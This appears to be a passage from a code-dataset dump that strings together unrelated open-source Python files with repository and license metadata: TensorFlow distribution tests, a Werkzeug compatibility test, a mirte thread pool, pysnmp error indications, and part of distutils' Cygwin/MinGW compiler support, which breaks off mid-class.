klass.clean_up(TEST_DIR, "*.py?") klass.clean_up(PLUGINS_CODE_DIR, "*.py?") klass.clean_up(MAIN_CODE_DIR, "*.py?")
mit
ArtsiomCh/tensorflow
tensorflow/contrib/distributions/python/kernel_tests/transformed_distribution_test.py
8
16622
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for TransformedDistribution.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from scipy import stats from tensorflow.contrib import distributions from tensorflow.contrib import linalg from tensorflow.contrib.distributions.python.ops import bijectors from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_shape from tensorflow.python.ops import array_ops from tensorflow.python.ops import math_ops from tensorflow.python.platform import test bs = bijectors ds = distributions la = linalg class TransformedDistributionTest(test.TestCase): def _cls(self): return ds.TransformedDistribution def _make_unimplemented(self, name): def _unimplemented(self, *args): # pylint: disable=unused-argument raise NotImplementedError("{} not implemented".format(name)) return _unimplemented def testTransformedDistribution(self): g = ops.Graph() with g.as_default(): mu = 3.0 sigma = 2.0 # Note: the Jacobian callable only works for this example; more generally # you may or may not need a reduce_sum. log_normal = self._cls()( distribution=ds.Normal(loc=mu, scale=sigma), bijector=bs.Exp(event_ndims=0)) sp_dist = stats.lognorm(s=sigma, scale=np.exp(mu)) # sample sample = log_normal.sample(100000, seed=235) self.assertAllEqual([], log_normal.event_shape) with self.test_session(graph=g): self.assertAllEqual([], log_normal.event_shape_tensor().eval()) self.assertAllClose( sp_dist.mean(), np.mean(sample.eval()), atol=0.0, rtol=0.05) # pdf, log_pdf, cdf, etc... # The mean of the lognormal is around 148. test_vals = np.linspace(0.1, 1000., num=20).astype(np.float32) for func in [[log_normal.log_prob, sp_dist.logpdf], [log_normal.prob, sp_dist.pdf], [log_normal.log_cdf, sp_dist.logcdf], [log_normal.cdf, sp_dist.cdf], [log_normal.survival_function, sp_dist.sf], [log_normal.log_survival_function, sp_dist.logsf]]: actual = func[0](test_vals) expected = func[1](test_vals) with self.test_session(graph=g): self.assertAllClose(expected, actual.eval(), atol=0, rtol=0.01) def testNonInjectiveTransformedDistribution(self): g = ops.Graph() with g.as_default(): mu = 1. sigma = 2.0 abs_normal = self._cls()( distribution=ds.Normal(loc=mu, scale=sigma), bijector=bs.AbsoluteValue(event_ndims=0)) sp_normal = stats.norm(mu, sigma) # sample sample = abs_normal.sample(100000, seed=235) self.assertAllEqual([], abs_normal.event_shape) with self.test_session(graph=g): sample_ = sample.eval() self.assertAllEqual([], abs_normal.event_shape_tensor().eval()) # Abs > 0, duh! 
np.testing.assert_array_less(0, sample_) # Let X ~ Normal(mu, sigma), Y := |X|, then # P[Y < 0.77] = P[-0.77 < X < 0.77] self.assertAllClose( sp_normal.cdf(0.77) - sp_normal.cdf(-0.77), (sample_ < 0.77).mean(), rtol=0.01) # p_Y(y) = p_X(-y) + p_X(y), self.assertAllClose( sp_normal.pdf(1.13) + sp_normal.pdf(-1.13), abs_normal.prob(1.13).eval()) # Log[p_Y(y)] = Log[p_X(-y) + p_X(y)] self.assertAllClose( np.log(sp_normal.pdf(2.13) + sp_normal.pdf(-2.13)), abs_normal.log_prob(2.13).eval()) def testQuantile(self): with self.test_session() as sess: logit_normal = self._cls()( distribution=ds.Normal(loc=0., scale=1.), bijector=bs.Sigmoid(), validate_args=True) grid = [0., 0.25, 0.5, 0.75, 1.] q = logit_normal.quantile(grid) cdf = logit_normal.cdf(q) cdf_ = sess.run(cdf) self.assertAllClose(grid, cdf_, rtol=1e-6, atol=0.) def testCachedSamples(self): exp_forward_only = bs.Exp(event_ndims=0) exp_forward_only._inverse = self._make_unimplemented( "inverse") exp_forward_only._inverse_event_shape_tensor = self._make_unimplemented( "inverse_event_shape_tensor ") exp_forward_only._inverse_event_shape = self._make_unimplemented( "inverse_event_shape ") exp_forward_only._inverse_log_det_jacobian = self._make_unimplemented( "inverse_log_det_jacobian ") with self.test_session() as sess: mu = 3.0 sigma = 0.02 log_normal = self._cls()( distribution=ds.Normal(loc=mu, scale=sigma), bijector=exp_forward_only) sample = log_normal.sample([2, 3], seed=42) sample_val, log_pdf_val = sess.run([sample, log_normal.log_prob(sample)]) expected_log_pdf = stats.lognorm.logpdf( sample_val, s=sigma, scale=np.exp(mu)) self.assertAllClose(expected_log_pdf, log_pdf_val, rtol=1e-4, atol=0.) def testCachedSamplesInvert(self): exp_inverse_only = bs.Exp(event_ndims=0) exp_inverse_only._forward = self._make_unimplemented( "forward") exp_inverse_only._forward_event_shape_tensor = self._make_unimplemented( "forward_event_shape_tensor ") exp_inverse_only._forward_event_shape = self._make_unimplemented( "forward_event_shape ") exp_inverse_only._forward_log_det_jacobian = self._make_unimplemented( "forward_log_det_jacobian ") log_forward_only = bs.Invert(exp_inverse_only) with self.test_session() as sess: # The log bijector isn't defined over the whole real line, so we make # sigma sufficiently small so that the draws are positive. mu = 2. sigma = 1e-2 exp_normal = self._cls()( distribution=ds.Normal(loc=mu, scale=sigma), bijector=log_forward_only) sample = exp_normal.sample([2, 3], seed=42) sample_val, log_pdf_val = sess.run([sample, exp_normal.log_prob(sample)]) expected_log_pdf = sample_val + stats.norm.logpdf( np.exp(sample_val), loc=mu, scale=sigma) self.assertAllClose(expected_log_pdf, log_pdf_val, atol=0.) def testShapeChangingBijector(self): with self.test_session(): softmax = bs.SoftmaxCentered() standard_normal = ds.Normal(loc=0., scale=1.) 
multi_logit_normal = self._cls()( distribution=standard_normal, bijector=softmax) x = [[-np.log(3.), 0.], [np.log(3), np.log(5)]] y = softmax.forward(x).eval() expected_log_pdf = (stats.norm(loc=0., scale=1.).logpdf(x) - np.sum(np.log(y), axis=-1)) self.assertAllClose(expected_log_pdf, multi_logit_normal.log_prob(y).eval()) self.assertAllClose( [1, 2, 3, 2], array_ops.shape(multi_logit_normal.sample([1, 2, 3])).eval()) self.assertAllEqual([2], multi_logit_normal.event_shape) self.assertAllEqual([2], multi_logit_normal.event_shape_tensor().eval()) def testEntropy(self): with self.test_session(): shift = np.array([[-1, 0, 1], [-1, -2, -3]], dtype=np.float32) diag = np.array([[1, 2, 3], [2, 3, 2]], dtype=np.float32) actual_mvn_entropy = np.concatenate([ [stats.multivariate_normal(shift[i], np.diag(diag[i]**2)).entropy()] for i in range(len(diag))]) fake_mvn = self._cls()( ds.MultivariateNormalDiag( loc=array_ops.zeros_like(shift), scale_diag=array_ops.ones_like(diag), validate_args=True), bs.AffineLinearOperator( shift, scale=la.LinearOperatorDiag(diag, is_non_singular=True), validate_args=True), validate_args=True) self.assertAllClose(actual_mvn_entropy, fake_mvn.entropy().eval()) def testScalarBatchScalarEventIdentityScale(self): with self.test_session() as sess: exp2 = self._cls()( ds.Exponential(rate=0.25), bijector=ds.bijectors.Affine( scale_identity_multiplier=2., event_ndims=0)) log_prob = exp2.log_prob(1.) log_prob_ = sess.run(log_prob) base_log_prob = -0.5 * 0.25 + np.log(0.25) ildj = np.log(2.) self.assertAllClose(base_log_prob - ildj, log_prob_, rtol=1e-6, atol=0.) class ScalarToMultiTest(test.TestCase): def _cls(self): return ds.TransformedDistribution def setUp(self): self._shift = np.array([-1, 0, 1], dtype=np.float32) self._tril = np.array([[[1., 0, 0], [2, 1, 0], [3, 2, 1]], [[2, 0, 0], [3, 2, 0], [4, 3, 2]]], dtype=np.float32) def _testMVN(self, base_distribution_class, base_distribution_kwargs, batch_shape=(), event_shape=(), not_implemented_message=None): with self.test_session() as sess: # Overriding shapes must be compatible w/bijector; most bijectors are # batch_shape agnostic and only care about event_ndims. # In the case of `Affine`, if we got it wrong then it would fire an # exception due to incompatible dimensions. batch_shape_pl = array_ops.placeholder( dtypes.int32, name="dynamic_batch_shape") event_shape_pl = array_ops.placeholder( dtypes.int32, name="dynamic_event_shape") feed_dict = {batch_shape_pl: np.array(batch_shape, dtype=np.int32), event_shape_pl: np.array(event_shape, dtype=np.int32)} fake_mvn_dynamic = self._cls()( distribution=base_distribution_class(validate_args=True, **base_distribution_kwargs), bijector=bs.Affine(shift=self._shift, scale_tril=self._tril), batch_shape=batch_shape_pl, event_shape=event_shape_pl, validate_args=True) fake_mvn_static = self._cls()( distribution=base_distribution_class(validate_args=True, **base_distribution_kwargs), bijector=bs.Affine(shift=self._shift, scale_tril=self._tril), batch_shape=batch_shape, event_shape=event_shape, validate_args=True) actual_mean = np.tile(self._shift, [2, 1]) # Affine elided this tile. 
actual_cov = np.matmul(self._tril, np.transpose(self._tril, [0, 2, 1])) def actual_mvn_log_prob(x): return np.concatenate([ [stats.multivariate_normal( actual_mean[i], actual_cov[i]).logpdf(x[:, i, :])] for i in range(len(actual_cov))]).T actual_mvn_entropy = np.concatenate([ [stats.multivariate_normal( actual_mean[i], actual_cov[i]).entropy()] for i in range(len(actual_cov))]) self.assertAllEqual([3], fake_mvn_static.event_shape) self.assertAllEqual([2], fake_mvn_static.batch_shape) self.assertAllEqual(tensor_shape.TensorShape(None), fake_mvn_dynamic.event_shape) self.assertAllEqual(tensor_shape.TensorShape(None), fake_mvn_dynamic.batch_shape) x = fake_mvn_static.sample(5, seed=0).eval() for unsupported_fn in (fake_mvn_static.log_cdf, fake_mvn_static.cdf, fake_mvn_static.survival_function, fake_mvn_static.log_survival_function): with self.assertRaisesRegexp(NotImplementedError, not_implemented_message): unsupported_fn(x) num_samples = 5e3 for fake_mvn, feed_dict in ((fake_mvn_static, {}), (fake_mvn_dynamic, feed_dict)): # Ensure sample works by checking first, second moments. y = fake_mvn.sample(int(num_samples), seed=0) x = y[0:5, ...] sample_mean = math_ops.reduce_mean(y, 0) centered_y = array_ops.transpose(y - sample_mean, [1, 2, 0]) sample_cov = math_ops.matmul( centered_y, centered_y, transpose_b=True) / num_samples [ sample_mean_, sample_cov_, x_, fake_event_shape_, fake_batch_shape_, fake_log_prob_, fake_prob_, fake_entropy_, ] = sess.run([ sample_mean, sample_cov, x, fake_mvn.event_shape_tensor(), fake_mvn.batch_shape_tensor(), fake_mvn.log_prob(x), fake_mvn.prob(x), fake_mvn.entropy(), ], feed_dict=feed_dict) self.assertAllClose(actual_mean, sample_mean_, atol=0.1, rtol=0.1) self.assertAllClose(actual_cov, sample_cov_, atol=0., rtol=0.1) # Ensure all other functions work as intended. self.assertAllEqual([5, 2, 3], x_.shape) self.assertAllEqual([3], fake_event_shape_) self.assertAllEqual([2], fake_batch_shape_) self.assertAllClose(actual_mvn_log_prob(x_), fake_log_prob_, atol=0., rtol=1e-6) self.assertAllClose(np.exp(actual_mvn_log_prob(x_)), fake_prob_, atol=0., rtol=1e-5) self.assertAllClose(actual_mvn_entropy, fake_entropy_, atol=0., rtol=1e-6) def testScalarBatchScalarEvent(self): self._testMVN( base_distribution_class=ds.Normal, base_distribution_kwargs={"loc": 0., "scale": 1.}, batch_shape=[2], event_shape=[3], not_implemented_message="not implemented when overriding event_shape") def testScalarBatchNonScalarEvent(self): self._testMVN( base_distribution_class=ds.MultivariateNormalDiag, base_distribution_kwargs={"loc": [0., 0., 0.], "scale_diag": [1., 1, 1]}, batch_shape=[2], not_implemented_message="not implemented") with self.test_session(): # Can't override event_shape for scalar batch, non-scalar event. with self.assertRaisesRegexp(ValueError, "base distribution not scalar"): self._cls()( distribution=ds.MultivariateNormalDiag(loc=[0.], scale_diag=[1.]), bijector=bs.Affine(shift=self._shift, scale_tril=self._tril), batch_shape=[2], event_shape=[3], validate_args=True) def testNonScalarBatchScalarEvent(self): self._testMVN( base_distribution_class=ds.Normal, base_distribution_kwargs={"loc": [0., 0], "scale": [1., 1]}, event_shape=[3], not_implemented_message="not implemented when overriding event_shape") with self.test_session(): # Can't override batch_shape for non-scalar batch, scalar event. 
with self.assertRaisesRegexp(ValueError, "base distribution not scalar"): self._cls()( distribution=ds.Normal(loc=[0.], scale=[1.]), bijector=bs.Affine(shift=self._shift, scale_tril=self._tril), batch_shape=[2], event_shape=[3], validate_args=True) def testNonScalarBatchNonScalarEvent(self): with self.test_session(): # Can't override event_shape and/or batch_shape for non_scalar batch, # non-scalar event. with self.assertRaisesRegexp(ValueError, "base distribution not scalar"): self._cls()( distribution=ds.MultivariateNormalDiag(loc=[[0.]], scale_diag=[[1.]]), bijector=bs.Affine(shift=self._shift, scale_tril=self._tril), batch_shape=[2], event_shape=[3], validate_args=True) if __name__ == "__main__": test.main()
apache-2.0
niieani/rethinkdb
test/rql_test/connections/http_support/werkzeug/testsuite/compat.py
146
1117
# -*- coding: utf-8 -*-
"""
    werkzeug.testsuite.compat
    ~~~~~~~~~~~~~~~~~~~~~~~~~

    Ensure that old stuff does not break on update.

    :copyright: (c) 2014 by Armin Ronacher.
    :license: BSD, see LICENSE for more details.
"""
import unittest
import warnings

from werkzeug.testsuite import WerkzeugTestCase

from werkzeug.wrappers import Response
from werkzeug.test import create_environ


class CompatTestCase(WerkzeugTestCase):

    def test_old_imports(self):
        from werkzeug.utils import Headers, MultiDict, CombinedMultiDict, \
            EnvironHeaders
        from werkzeug.http import Accept, MIMEAccept, CharsetAccept, \
            LanguageAccept, ETags, HeaderSet, WWWAuthenticate, \
            Authorization

    def test_exposed_werkzeug_mod(self):
        import werkzeug
        for key in werkzeug.__all__:
            # deprecated, skip it
            if key in ('templates', 'Template'):
                continue
            getattr(werkzeug, key)


def suite():
    suite = unittest.TestSuite()
    suite.addTest(unittest.makeSuite(CompatTestCase))
    return suite
agpl-3.0
bwesterb/mirte
src/threadPool.py
1
5025
from mirte.core import Module from six.moves import range import logging import threading try: import prctl except ImportError: prctl = None class ThreadPool(Module): class Worker(threading.Thread): def __init__(self, pool, l): self._name = None threading.Thread.__init__(self) self.l = l self.pool = pool def run(self): self.l.debug("Hello") self.name = '(pristine)' self.pool.cond.acquire() self.pool.actualFT += 1 while True: if not self.pool.running: break if not self.pool.jobs: self.pool.cond.wait() continue job, name = self.pool.jobs.pop() self.name = name self.pool.actualFT -= 1 self.pool.cond.release() try: ret = job() except Exception: self.l.exception("Uncaught exception") ret = True # delete job. Otherwise job will stay alive # while we wait on self.pool.cond del(job) self.pool.cond.acquire() self.name = '(free)' self.pool.actualFT += 1 self.pool.expectedFT += 1 if not ret: break self.pool.actualFT -= 1 self.pool.expectedFT -= 1 self.pool.workers.remove(self) self.pool.cond.release() self.l.debug("Bye (%s)" % self.name) @property def name(self): return self._name @name.setter def name(self, value): self._name = value if prctl: if value: prctl.set_name(value) else: prctl.set_name('(no name)') def __init__(self, *args, **kwargs): super(ThreadPool, self).__init__(*args, **kwargs) self.running = True self.jobs = list() self.cond = threading.Condition() self.mcond = threading.Condition() self.actualFT = 0 # actual number of free threads self.expectedFT = 0 # expected number of free threads self.expectedT = 0 # expected number of threads self.ncreated = 0 # total number of threads created self.workers = set() def _remove_worker(self): self._queue(lambda: False, False) self.expectedT -= 1 def _create_worker(self): self.ncreated += 1 self.expectedFT += 1 self.expectedT += 1 n = self.ncreated l = logging.LoggerAdapter(self.l, {'sid': n}) t = ThreadPool.Worker(self, l) self.workers.add(t) t.start() def start(self): self.main_thread = threading.Thread(target=self.run) self.main_thread.start() def run(self): self.mcond.acquire() while self.running: self.cond.acquire() gotoSleep = False tc = max(self.minFree - self.expectedFT + len(self.jobs), self.min - self.expectedT) td = min(self.expectedFT - len(self.jobs) - self.maxFree, self.expectedT - self.min) if tc > 0: for i in range(tc): self._create_worker() elif td > 0: for i in range(td): self._remove_worker() else: gotoSleep = True self.cond.release() if gotoSleep: self.mcond.wait() self.l.info("Waking and joining all workers") with self.cond: self.cond.notifyAll() workers = list(self.workers) self.mcond.release() for worker in workers: while True: worker.join(1) if not worker.isAlive(): break self.l.warn("Still waiting on %s" % worker) self.l.info(" joined") def stop(self): self.running = False with self.mcond: self.mcond.notify() def _queue(self, raw, name=None): if self.actualFT == 0: self.l.warn("No actual free threads, yet " + "(increase threadPool.minFree)") self.jobs.append((raw, name)) self.expectedFT -= 1 self.cond.notify() self.mcond.notify() def execute_named(self, function, name=None, *args, **kwargs): def _entry(): function(*args, **kwargs) return True with self.mcond: with self.cond: self._queue(_entry, name) def execute(self, function, *args, **kwargs): self.execute_named(function, None, *args, **kwargs) def join(self): self.main_thread.join() # vim: et:sta:bs=2:sw=4:
agpl-3.0
ww9rivers/pysnmp
pysnmp/proto/errind.py
4
5505
# # This file is part of pysnmp software. # # Copyright (c) 2005-2016, Ilya Etingof <[email protected]> # License: http://pysnmp.sf.net/license.html # class ErrorIndication: """SNMPv3 error-indication values""" def __init__(self, descr=None): self.__value = self.__descr = self.__class__.__name__[0].lower() + self.__class__.__name__[1:] if descr: self.__descr = descr def __eq__(self, other): return self.__value == other def __ne__(self, other): return self.__value != other def __lt__(self, other): return self.__value < other def __le__(self, other): return self.__value <= other def __gt__(self, other): return self.__value > other def __ge__(self, other): return self.__value >= other def __str__(self): return self.__descr # SNMP message processing errors class SerializationError(ErrorIndication): pass serializationError = SerializationError('SNMP message serialization error') class DeserializationError(ErrorIndication): pass deserializationError = DeserializationError('SNMP message deserialization error') class ParseError(DeserializationError): pass parseError = ParseError('SNMP message deserialization error') class UnsupportedMsgProcessingModel(ErrorIndication): pass unsupportedMsgProcessingModel = UnsupportedMsgProcessingModel('Unknown SNMP message processing model ID encountered') class UnknownPDUHandler(ErrorIndication): pass unknownPDUHandler = UnknownPDUHandler('Unhandled PDU type encountered') class UnsupportedPDUtype(ErrorIndication): pass unsupportedPDUtype = UnsupportedPDUtype('Unsupported SNMP PDU type encountered') class RequestTimedOut(ErrorIndication): pass requestTimedOut = RequestTimedOut('No SNMP response received before timeout') class EmptyResponse(ErrorIndication): pass emptyResponse = EmptyResponse('Empty SNMP response message') class NonReportable(ErrorIndication): pass nonReportable = NonReportable('Report PDU generation not attempted') class DataMismatch(ErrorIndication): pass dataMismatch = DataMismatch('SNMP request/response parameters mismatched') class EngineIDMismatch(ErrorIndication): pass engineIDMismatch = EngineIDMismatch('SNMP engine ID mismatch encountered') class UnknownEngineID(ErrorIndication): pass unknownEngineID = UnknownEngineID('Unknown SNMP engine ID encountered') class TooBig(ErrorIndication): pass tooBig = TooBig('SNMP message will be too big') class LoopTerminated(ErrorIndication): pass loopTerminated = LoopTerminated('Infinite SNMP entities talk terminated') class InvalidMsg(ErrorIndication): pass invalidMsg = InvalidMsg('Invalid SNMP message header parameters encountered') # SNMP security modules errors class UnknownCommunityName(ErrorIndication): pass unknownCommunityName = UnknownCommunityName('Unknown SNMP community name encountered') class NoEncryption(ErrorIndication): pass noEncryption = NoEncryption('No encryption services configured') class EncryptionError(ErrorIndication): pass encryptionError = EncryptionError('Ciphering services not available') class DecryptionError(ErrorIndication): pass decryptionError = DecryptionError('Ciphering services not available or ciphertext is broken') class NoAuthentication(ErrorIndication): pass noAuthentication = NoAuthentication('No authentication services configured') class AuthenticationError(ErrorIndication): pass authenticationError = AuthenticationError('Ciphering services not available or bad parameters') class AuthenticationFailure(ErrorIndication): pass authenticationFailure = AuthenticationFailure('Authenticator mismatched') class UnsupportedAuthProtocol(ErrorIndication): pass 
unsupportedAuthProtocol = UnsupportedAuthProtocol('Authentication protocol is not supported')

class UnsupportedPrivProtocol(ErrorIndication):
    pass

unsupportedPrivProtocol = UnsupportedPrivProtocol('Privacy protocol is not supported')

class UnknownSecurityName(ErrorIndication):
    pass

unknownSecurityName = UnknownSecurityName('Unknown SNMP security name encountered')

class UnsupportedSecurityModel(ErrorIndication):
    pass

unsupportedSecurityModel = UnsupportedSecurityModel('Unsupported SNMP security model')

class UnsupportedSecurityLevel(ErrorIndication):
    pass

unsupportedSecurityLevel = UnsupportedSecurityLevel('Unsupported SNMP security level')

class NotInTimeWindow(ErrorIndication):
    pass

notInTimeWindow = NotInTimeWindow('SNMP message timing parameters not in windows of trust')

# SNMP access-control errors

class NoSuchView(ErrorIndication):
    pass

noSuchView = NoSuchView('No such MIB view currently exists')

class NoAccessEntry(ErrorIndication):
    pass

noAccessEntry = NoAccessEntry('Access to MIB node denied')

class NoGroupName(ErrorIndication):
    pass

noGroupName = NoGroupName('No such VACM group configured')

class NoSuchContext(ErrorIndication):
    pass

noSuchContext = NoSuchContext('SNMP context not found')

class NotInView(ErrorIndication):
    pass

notInView = NotInView('Requested OID is out of MIB view')

class AccessAllowed(ErrorIndication):
    pass

accessAllowed = AccessAllowed()

class OtherError(ErrorIndication):
    pass

otherError = OtherError('Unspecified SNMP engine error occurred')

# SNMP Apps errors

class OidNotIncreasing(ErrorIndication):
    pass

oidNotIncreasing = OidNotIncreasing('OIDs are not increasing')
bsd-2-clause
vlachoudis/sl4a
python/src/Lib/distutils/cygwinccompiler.py
50
17299
"""distutils.cygwinccompiler Provides the CygwinCCompiler class, a subclass of UnixCCompiler that handles the Cygwin port of the GNU C compiler to Windows. It also contains the Mingw32CCompiler class which handles the mingw32 port of GCC (same as cygwin in no-cygwin mode). """ # problems: # # * if you use a msvc compiled python version (1.5.2) # 1. you have to insert a __GNUC__ section in its config.h # 2. you have to generate a import library for its dll # - create a def-file for python??.dll # - create a import library using # dlltool --dllname python15.dll --def python15.def \ # --output-lib libpython15.a # # see also http://starship.python.net/crew/kernr/mingw32/Notes.html # # * We put export_symbols in a def-file, and don't use # --export-all-symbols because it doesn't worked reliable in some # tested configurations. And because other windows compilers also # need their symbols specified this no serious problem. # # tested configurations: # # * cygwin gcc 2.91.57/ld 2.9.4/dllwrap 0.2.4 works # (after patching python's config.h and for C++ some other include files) # see also http://starship.python.net/crew/kernr/mingw32/Notes.html # * mingw32 gcc 2.95.2/ld 2.9.4/dllwrap 0.2.4 works # (ld doesn't support -shared, so we use dllwrap) # * cygwin gcc 2.95.2/ld 2.10.90/dllwrap 2.10.90 works now # - its dllwrap doesn't work, there is a bug in binutils 2.10.90 # see also http://sources.redhat.com/ml/cygwin/2000-06/msg01274.html # - using gcc -mdll instead dllwrap doesn't work without -static because # it tries to link against dlls instead their import libraries. (If # it finds the dll first.) # By specifying -static we force ld to link against the import libraries, # this is windows standard and there are normally not the necessary symbols # in the dlls. # *** only the version of June 2000 shows these problems # * cygwin gcc 3.2/ld 2.13.90 works # (ld supports -shared) # * mingw gcc 3.2/ld 2.13 works # (ld supports -shared) # This module should be kept compatible with Python 2.1. __revision__ = "$Id: cygwinccompiler.py 65834 2008-08-18 19:23:47Z amaury.forgeotdarc $" import os,sys,copy from distutils.ccompiler import gen_preprocess_options, gen_lib_options from distutils.unixccompiler import UnixCCompiler from distutils.file_util import write_file from distutils.errors import DistutilsExecError, CompileError, UnknownFileError from distutils import log def get_msvcr(): """Include the appropriate MSVC runtime library if Python was built with MSVC 7.0 or later. """ msc_pos = sys.version.find('MSC v.') if msc_pos != -1: msc_ver = sys.version[msc_pos+6:msc_pos+10] if msc_ver == '1300': # MSVC 7.0 return ['msvcr70'] elif msc_ver == '1310': # MSVC 7.1 return ['msvcr71'] elif msc_ver == '1400': # VS2005 / MSVC 8.0 return ['msvcr80'] elif msc_ver == '1500': # VS2008 / MSVC 9.0 return ['msvcr90'] else: raise ValueError("Unknown MS Compiler version %i " % msc_Ver) class CygwinCCompiler (UnixCCompiler): compiler_type = 'cygwin' obj_extension = ".o" static_lib_extension = ".a" shared_lib_extension = ".dll" static_lib_format = "lib%s%s" shared_lib_format = "%s%s" exe_extension = ".exe" def __init__ (self, verbose=0, dry_run=0, force=0): UnixCCompiler.__init__ (self, verbose, dry_run, force) (status, details) = check_config_h() self.debug_print("Python's GCC status: %s (details: %s)" % (status, details)) if status is not CONFIG_H_OK: self.warn( "Python's pyconfig.h doesn't seem to support your compiler. " "Reason: %s. " "Compiling may fail because of undefined preprocessor macros." 
% details) self.gcc_version, self.ld_version, self.dllwrap_version = \ get_versions() self.debug_print(self.compiler_type + ": gcc %s, ld %s, dllwrap %s\n" % (self.gcc_version, self.ld_version, self.dllwrap_version) ) # ld_version >= "2.10.90" and < "2.13" should also be able to use # gcc -mdll instead of dllwrap # Older dllwraps had own version numbers, newer ones use the # same as the rest of binutils ( also ld ) # dllwrap 2.10.90 is buggy if self.ld_version >= "2.10.90": self.linker_dll = "gcc" else: self.linker_dll = "dllwrap" # ld_version >= "2.13" support -shared so use it instead of # -mdll -static if self.ld_version >= "2.13": shared_option = "-shared" else: shared_option = "-mdll -static" # Hard-code GCC because that's what this is all about. # XXX optimization, warnings etc. should be customizable. self.set_executables(compiler='gcc -mcygwin -O -Wall', compiler_so='gcc -mcygwin -mdll -O -Wall', compiler_cxx='g++ -mcygwin -O -Wall', linker_exe='gcc -mcygwin', linker_so=('%s -mcygwin %s' % (self.linker_dll, shared_option))) # cygwin and mingw32 need different sets of libraries if self.gcc_version == "2.91.57": # cygwin shouldn't need msvcrt, but without the dlls will crash # (gcc version 2.91.57) -- perhaps something about initialization self.dll_libraries=["msvcrt"] self.warn( "Consider upgrading to a newer version of gcc") else: # Include the appropriate MSVC runtime library if Python was built # with MSVC 7.0 or later. self.dll_libraries = get_msvcr() # __init__ () def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts): if ext == '.rc' or ext == '.res': # gcc needs '.res' and '.rc' compiled to object files !!! try: self.spawn(["windres", "-i", src, "-o", obj]) except DistutilsExecError, msg: raise CompileError, msg else: # for other files use the C-compiler try: self.spawn(self.compiler_so + cc_args + [src, '-o', obj] + extra_postargs) except DistutilsExecError, msg: raise CompileError, msg def link (self, target_desc, objects, output_filename, output_dir=None, libraries=None, library_dirs=None, runtime_library_dirs=None, export_symbols=None, debug=0, extra_preargs=None, extra_postargs=None, build_temp=None, target_lang=None): # use separate copies, so we can modify the lists extra_preargs = copy.copy(extra_preargs or []) libraries = copy.copy(libraries or []) objects = copy.copy(objects or []) # Additional libraries libraries.extend(self.dll_libraries) # handle export symbols by creating a def-file # with executables this only works with gcc/ld as linker if ((export_symbols is not None) and (target_desc != self.EXECUTABLE or self.linker_dll == "gcc")): # (The linker doesn't do anything if output is up-to-date. # So it would probably better to check if we really need this, # but for this we had to insert some unchanged parts of # UnixCCompiler, and this is not what we want.) 
# we want to put some files in the same directory as the # object files are, build_temp doesn't help much # where are the object files temp_dir = os.path.dirname(objects[0]) # name of dll to give the helper files the same base name (dll_name, dll_extension) = os.path.splitext( os.path.basename(output_filename)) # generate the filenames for these files def_file = os.path.join(temp_dir, dll_name + ".def") lib_file = os.path.join(temp_dir, 'lib' + dll_name + ".a") # Generate .def file contents = [ "LIBRARY %s" % os.path.basename(output_filename), "EXPORTS"] for sym in export_symbols: contents.append(sym) self.execute(write_file, (def_file, contents), "writing %s" % def_file) # next add options for def-file and to creating import libraries # dllwrap uses different options than gcc/ld if self.linker_dll == "dllwrap": extra_preargs.extend(["--output-lib", lib_file]) # for dllwrap we have to use a special option extra_preargs.extend(["--def", def_file]) # we use gcc/ld here and can be sure ld is >= 2.9.10 else: # doesn't work: bfd_close build\...\libfoo.a: Invalid operation #extra_preargs.extend(["-Wl,--out-implib,%s" % lib_file]) # for gcc/ld the def-file is specified as any object files objects.append(def_file) #end: if ((export_symbols is not None) and # (target_desc != self.EXECUTABLE or self.linker_dll == "gcc")): # who wants symbols and a many times larger output file # should explicitly switch the debug mode on # otherwise we let dllwrap/ld strip the output file # (On my machine: 10KB < stripped_file < ??100KB # unstripped_file = stripped_file + XXX KB # ( XXX=254 for a typical python extension)) if not debug: extra_preargs.append("-s") UnixCCompiler.link(self, target_desc, objects, output_filename, output_dir, libraries, library_dirs, runtime_library_dirs, None, # export_symbols, we do this in our def-file debug, extra_preargs, extra_postargs, build_temp, target_lang) # link () # -- Miscellaneous methods ----------------------------------------- # overwrite the one from CCompiler to support rc and res-files def object_filenames (self, source_filenames, strip_dir=0, output_dir=''): if output_dir is None: output_dir = '' obj_names = [] for src_name in source_filenames: # use normcase to make sure '.rc' is really '.rc' and not '.RC' (base, ext) = os.path.splitext (os.path.normcase(src_name)) if ext not in (self.src_extensions + ['.rc','.res']): raise UnknownFileError, \ "unknown file type '%s' (from '%s')" % \ (ext, src_name) if strip_dir: base = os.path.basename (base) if ext == '.res' or ext == '.rc': # these need to be compiled to object files obj_names.append (os.path.join (output_dir, base + ext + self.obj_extension)) else: obj_names.append (os.path.join (output_dir, base + self.obj_extension)) return obj_names # object_filenames () # class CygwinCCompiler # the same as cygwin plus some additional parameters class Mingw32CCompiler (CygwinCCompiler): compiler_type = 'mingw32' def __init__ (self, verbose=0, dry_run=0, force=0): CygwinCCompiler.__init__ (self, verbose, dry_run, force) # ld_version >= "2.13" support -shared so use it instead of # -mdll -static if self.ld_version >= "2.13": shared_option = "-shared" else: shared_option = "-mdll -static" # A real mingw32 doesn't need to specify a different entry point, # but cygwin 2.91.57 in no-cygwin-mode needs it. 
